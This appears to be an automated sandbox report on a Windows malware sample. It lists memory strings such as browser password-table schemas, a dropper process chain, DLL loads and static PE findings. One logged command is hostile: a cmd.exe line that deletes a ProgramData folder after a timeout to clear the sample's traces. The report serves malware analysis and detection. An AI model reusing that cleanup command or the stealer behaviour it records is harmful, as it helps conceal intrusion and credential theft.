Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2958774188.0000000019083000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2958774188.0000000019086000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2975024579.000000001907F000.00000004.00000020.00020000.00000000.sdmp, FBGHII.10.dr, HJDBAF.10.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: IRqsWvBBMc.exe

Virustotal: Detection: 54%

Source: IRqsWvBBMc.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

File read: C:\Users\user\Desktop\IRqsWvBBMc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IRqsWvBBMc.exe "C:\Users\user\Desktop\IRqsWvBBMc.exe"
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000019001\server.exe "C:\Users\user\AppData\Local\Temp\1000019001\server.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe "C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\ProgramData\CFHIIJDBKE.exe "C:\ProgramData\CFHIIJDBKE.exe"
Source: unknown	Process created: C:\ProgramData\CFHIIJDBKE.exe C:\ProgramData\CFHIIJDBKE.exe
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFCFBFHIEBKJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3000
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000019001\server.exe "C:\Users\user\AppData\Local\Temp\1000019001\server.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe "C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\ProgramData\CFHIIJDBKE.exe "C:\ProgramData\CFHIIJDBKE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFCFBFHIEBKJ" & exit	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Process created: C:\ProgramData\CFHIIJDBKE.exe C:\ProgramData\CFHIIJDBKE.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: IRqsWvBBMc.exe

Static file information: File size 1947648 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: IRqsWvBBMc.exe

Static PE information: Raw size of erhqbccx is bigger than: 0x100000 < 0x1a9e00

